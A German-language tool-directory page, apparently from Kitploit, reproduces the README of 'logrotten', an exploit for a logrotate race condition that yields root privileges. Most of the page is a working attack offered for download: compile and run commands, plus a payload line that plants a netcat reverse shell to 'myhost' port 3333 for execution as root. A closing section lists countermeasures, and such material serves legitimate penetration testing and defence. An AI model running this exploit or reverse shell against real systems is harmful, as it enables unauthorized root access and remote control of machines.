Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
logrotten — Logrotate-Race-Condition-Exploit, der eine Privilegienausweitung ermöglicht, indem beliebige Dateien, etwa Reverse-Shell-Payloads, in Systemverzeichnisse geschrieben werden. | Kitploit
Tools/GitHubGitHub/whotwagner/logrotten
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsRed TeamingBinary-Exploitation
GitHubwhotwagner/logrotten

logrotten

Logrotate-Race-Condition-Exploit, der eine Privilegienausweitung ermöglicht, indem beliebige Dateien, etwa Reverse-Shell-Payloads, in Systemverzeichnisse geschrieben werden.

Repository anzeigen
21126vor 7 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

[!WARNING]
Dieses Repository wurde nach https://codeberg.org/whotwagner/logrotten verschoben. Bitte besuchen Sie den neuen Standort für die neuesten Updates.

Ausnutzen einer Race Condition in logrotate zur Privilegienerweiterung

Logrotten Logo

Kurzbeschreibung

  • logrotate ist anfällig für eine Race Condition nach dem Umbenennen der Logdatei.
  • Wenn logrotate als root ausgeführt wird, mit einer Option, die eine Datei erstellt (wie create, copy, compress usw.), und der Benutzer die Kontrolle über den Logdateipfad hat, ist es möglich, eine Race Condition auszunutzen, um Dateien in beliebigen Verzeichnissen zu schreiben.
  • Ein Angreifer könnte seine Privilegien erweitern, indem er Reverse-Shells in Verzeichnisse wie "/etc/bash_completition.d/" schreibt.

Voraussetzung für die Privilegienerweiterung

  • Logrotate muss als root ausgeführt werden
  • Der Logpfad muss unter der Kontrolle des Angreifers stehen
  • In der logrotate-Konfiguration muss eine Option gesetzt sein, die Dateien erstellt

Getestete Versionen

  • Debian GNU/Linux 11 (bullseye)
  • Debian GNU/Linux 9.5 (stretch)
  • Amazon Linux 2 AMI (HVM)
  • Ubuntu 18.04.1
  • logrotate 3.8.6
  • logrotate 3.11.0
  • logrotate 3.15.0
  • logrotate 3.18.0

Kompilieren

  • gcc -o logrotten logrotten.c

Payload vorbereiten

root@kitploit:~
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile

Exploit ausführen

Wenn die Option "create" in logrotate.cfg gesetzt ist:

root@kitploit:~
./logrotten -p ./payloadfile /tmp/log/pwnme.log

Wenn die Option "compress" in logrotate.cfg gesetzt ist:

root@kitploit:~
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log

Bekannte Probleme

  • Es war schwierig, die Race Condition in einem Docker-Container oder auf einem lvm2-Volume zu gewinnen. Diese Version von logrotten verbessert die Zuverlässigkeit.

Gegenmaßnahmen

  • Stellen Sie sicher, dass der Logpfad root gehört
  • Verwenden Sie die Option "su" in logrotate.cfg
  • Verwenden Sie SELinux oder AppArmor

Autor

  • Wolfgang Hotwagner

Referenzen

  • https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
  • https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
  • https://github.com/whotwagner/logrotten
  • https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
  • https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd
Tool herunterladen